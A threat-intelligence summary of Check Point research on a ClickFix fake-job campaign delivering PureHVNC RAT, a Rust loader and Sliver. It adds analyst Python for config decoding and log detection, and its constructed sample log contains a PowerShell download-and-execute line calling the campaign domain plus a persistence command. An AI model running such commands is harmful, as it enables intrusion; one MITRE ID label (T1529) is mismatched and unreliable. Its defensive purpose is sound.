Check Point Research analyzed a ClickFix campaign that used fake job offers to deliver a Rust loader, PureHVNC RAT (campaign IDs 2a and amazon3), and later a Sliver implant, revealing a coordinated eight-day intrusion and full PureHVNC functionality. The investigation linked supporting GitHub repositories and a PureRAT builder to the PureCoder developer (timezone UTC+0300), exposing development infrastructure and PureCrypter features. #PureHVNC #PureCoder
Key points
- A ClickFix phishing campaign delivered a PowerShell command that led to malicious JavaScript, persistence, and initial deployment of PureHVNC RAT (C2 54.197.141.245, campaign ID 2a).
- On day two the actor deployed a Rust Loader (installed to %APPDATA%\Microsoft\SystemCertificates\9TwinAPIInterop.pfx) that unpacked a newer PureHVNC RAT (campaign ID amazon3) using Inno Setup.
- After a multi-day delay, the operator deployed a Sliver implant from hxxps://jq-scripts.global.ssl[.]fastly[.]net, which executed a PowerShell credential-harvesting script that stored the collected credentials in %ProgramData%/__cred.txt.
- Technical analysis of the Rust Loader shows ChaCha20-Poly1305 string decryption, anti-analysis checks (blacklisted processes and WMEmu APIs), AMSI bypass via LdrLoadDll hook, and payload decryption/execution of a .NET PureHVNC payload.
- PureHVNC uses a protobuf/Gzip/Base64 configuration, SSLStream C2 communication, extensive data collection (AV, system, installed apps, anti-sandbox checks), scheduled task persistence, and a registry-based plugin system with many plugins (HVNC, keylogger, clipper, proxy, DDoS, etc.).
- Check Point linked multiple GitHub repositories and commits (UTC+0300 timestamps) to PureCoder, identified developer infrastructure hosting support files (chromedriver, msedgedriver, WebDriver.dll), and discovered a PureRAT builder containing hardcoded GitHub URLs and PureCrypter enums.
- The research produced IOCs (file hashes, domains, C2 IP, GitHub accounts) and detailed PureCrypter configuration options, providing operational leads and actionable intelligence for defenders and law enforcement.
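The configuration layering described above (Base64 over Gzip over protobuf) can be peeled back without the bot's schema by walking the protobuf wire format. This is an added analyst helper, not Check Point's or the malware's code; the field numbers and the sample blob are constructed for illustration (the C2 IP and campaign ID are the values from the report, the port is assumed).

```python
"""Decode a PureHVNC-style config blob: Base64 -> Gzip -> protobuf wire format.
Added example; the real schema is not known here, so fields are reported as
(field_number, wire_type, value) tuples for the analyst to interpret."""
import base64
import gzip


def read_varint(buf: bytes, pos: int):
    """Read a base-128 little-endian varint starting at pos; return (value, new_pos)."""
    result, shift = 0, 0
    while True:
        b = buf[pos]
        pos += 1
        result |= (b & 0x7F) << shift
        if not b & 0x80:
            return result, pos
        shift += 7


def parse_protobuf(buf: bytes) -> list:
    """Schema-less walk of one protobuf message."""
    fields, pos = [], 0
    while pos < len(buf):
        key, pos = read_varint(buf, pos)
        field, wire = key >> 3, key & 7
        if wire == 0:                                   # varint (ints, bools, enums)
            val, pos = read_varint(buf, pos)
        elif wire == 2:                                 # length-delimited (string/bytes/nested)
            length, pos = read_varint(buf, pos)
            raw, pos = buf[pos:pos + length], pos + length
            try:
                val = raw.decode("utf-8")
            except UnicodeDecodeError:
                val = raw                               # nested message or binary: keep raw bytes
        elif wire in (1, 5):                            # fixed64 / fixed32
            size = 8 if wire == 1 else 4
            val, pos = int.from_bytes(buf[pos:pos + size], "little"), pos + size
        else:
            raise ValueError(f"unsupported wire type {wire} at offset {pos}")
        fields.append((field, wire, val))
    return fields


def decode_config(blob: str) -> list:
    """Reverse the Base64 -> Gzip -> protobuf layering."""
    return parse_protobuf(gzip.decompress(base64.b64decode(blob)))


# Constructed sample: field 1 = C2 host (string), field 2 = port 443 (varint, assumed),
# field 3 = campaign ID (string). Hand-encoded so no protobuf library is needed.
SAMPLE_PROTO = b"\x0a\x0e54.197.141.245\x10\xbb\x03\x1a\x07amazon3"
SAMPLE_CONFIG = base64.b64encode(gzip.compress(SAMPLE_PROTO)).decode()
```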
MITRE Techniques
- [T1204] User Execution – ClickFix phishing page tricked victims into pasting a PowerShell command that executed a malicious JavaScript file (“powershell -c … copied to their clipboard” resulting in download and eval of JS).
- [T1059] Command and Scripting Interpreter – PowerShell was used to execute the loader and maintain persistence via scheduled tasks (“powershell -Command … regsvr32.exe {MALWARE} /i:–type=renderer”).
- [T1105] Ingress Tool Transfer – PureHVNC bots downloaded supporting files from GitHub URLs delivered by C2 (“the bot received three GitHub URLs containing supporting files … downloaded the related files”).
- [T1547] Boot or Logon Autostart Execution – Malware created a Scheduled Task to maintain persistence, mimicking Google Updater (“Register-ScheduledTask … TaskName ‘GoogleUpdaterTaskSystem196.6.2928.90.{…}’”).
- [T1574] Hijack Execution Flow – The Rust Loader injects shellcode and executes a .NET payload via RunPE/shellcode after decrypting embedded payload (“creates a heap, copies the decrypted payload buffer into it, and executes the shellcode”).
- [T1140] Deobfuscate/Decode Files or Information – Strings and payloads were encrypted and decrypted at runtime (ChaCha20-Poly1305 for strings; XOR and AES+Gzip for payloads) (“encrypted strings … decrypted on demand using the ChaCha20-Poly1305 algorithm”).
- [T1529] System Network Configuration Discovery – PureHVNC collects installed antivirus products via WMI queries (“SELECT * FROM AntiVirusProduct”) and other system/app inventory to inform operator actions.
- [T1053] Scheduled Task/Job – Persistence implemented via creation of Scheduled Tasks with varying privileges and repetition settings (“Register-ScheduledTask … -RepetitionInterval (New-TimeSpan -Minutes 1)”).
- [T1562] Impair Defenses – AMSI bypass implemented by hooking LdrLoadDll in ntdll.dll to prevent amsi.dll from loading (“injecting a hook into the native LdrLoadDll function … prevents it from being loaded”).
- [T1189] Drive-by Compromise – Initial infection involved a web page (ClickFix) that automatically copied a command to victim clipboard and induced execution when pasted (“a PowerShell command was automatically copied to their clipboard, delivering a malicious JavaScript file”).
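The command fragments quoted in the T1059, T1547 and T1053 entries above are stable enough to hunt for in PowerShell script-block logs (Event ID 4104). The following is an added detection example, not Check Point's tooling; the regexes are built from the quoted fragments, the ClickFix rule is a looser heuristic, and the log lines are constructed (the task GUID is a placeholder).

```python
"""Flag PowerShell script-block text matching the persistence and ClickFix
patterns in the report. Added example; log lines are constructed."""
import re

# Each rule: (name, regex). Only the scheduled-task and regsvr32 rules are
# taken verbatim from the quoted commands; the ClickFix rule is an assumed shape.
RULES = [
    ("clickfix_js_loader",
     re.compile(r"powershell(\.exe)?\s+-c\b.*(iex|invoke-expression|downloadstring|\.js\b)", re.I)),
    ("googleupdater_task_mimic",
     re.compile(r"Register-ScheduledTask.*TaskName\s+['\"]?GoogleUpdaterTaskSystem", re.I)),
    ("one_minute_repetition",
     re.compile(r"Register-ScheduledTask.*-RepetitionInterval\s*\(New-TimeSpan\s+-Minutes\s+1\)", re.I)),
    ("regsvr32_renderer_arg",                          # accepts '--' or an extracted en dash
     re.compile(r"regsvr32(\.exe)?\s+\S+\s+/i:[-\u2013]{1,2}type=renderer", re.I)),
]


def classify(line: str) -> list:
    """Return the names of every rule that matches one script-block line."""
    return [name for name, rx in RULES if rx.search(line)]


def scan(lines) -> dict:
    """Map line index -> matched rule names, skipping lines with no hits."""
    hits = {}
    for i, line in enumerate(lines):
        names = classify(line)
        if names:
            hits[i] = names
    return hits


# Constructed sample script-block text; domain is from the report, path is made up.
SAMPLE_LOG = [
    "ScriptBlockText: powershell -c \"iex ((New-Object Net.WebClient)"
    ".DownloadString('hxxps://stathub[.]quest/x.js'))\"",
    "ScriptBlockText: Register-ScheduledTask -TaskName "
    "'GoogleUpdaterTaskSystem196.6.2928.90.{00000000-PLACEHOLDER-GUID}' "
    "-Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date) "
    "-RepetitionInterval (New-TimeSpan -Minutes 1)) "
    "-Action (New-ScheduledTaskAction -Execute 'powershell' "
    "-Argument '-Command regsvr32.exe C:\\Users\\Public\\loader.dll /i:--type=renderer')",
    "ScriptBlockText: Get-ChildItem C:\\temp | Sort-Object Length",
]
```

A task that re-fires every minute under a Google Updater name is the strongest of these signals; the regsvr32 `/i:--type=renderer` argument mimics a Chromium renderer command line and has no legitimate use with regsvr32.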
Indicators of Compromise
- [IP Address] PureHVNC C2 – 54.197.141.245
- [Domains] JavaScript C2 domains used by ClickFix JS – stathub[.]quest, stategiq[.]quest (also mktblend[.]monster, dsgnfwd[.]xyz, dndhub[.]xyz)
- [Hashes] Rust Loader and related samples – Rust Loader: 99CBBE5F68D50B79AF8FB748F51794DE137F4FE4; Inno Setup PureHVNC: D340B780194D44EE9B8D32F596B5A13723ABBE1D
- [Hashes] PureHVNC samples – First PureHVNC RAT: E3A79CE291546191A5DDB039B2F9BF523BB9C4FB; PureHVNC sample: 34EC79AB8A00DC6908874CDF7762756A2DCA4274 (and 1 more hash)
- [GitHub Repositories] Developer/test hosting – hxxps://github[.]com/DFfe9ewf (repos containing chromedriver.exe, msedgedriver.exe, WebDriver.dll); testdev account testdemo345 with similar uploads
Read more: https://research.checkpoint.com/2025/under-the-pure-curtain-from-rat-to-builder-to-coder/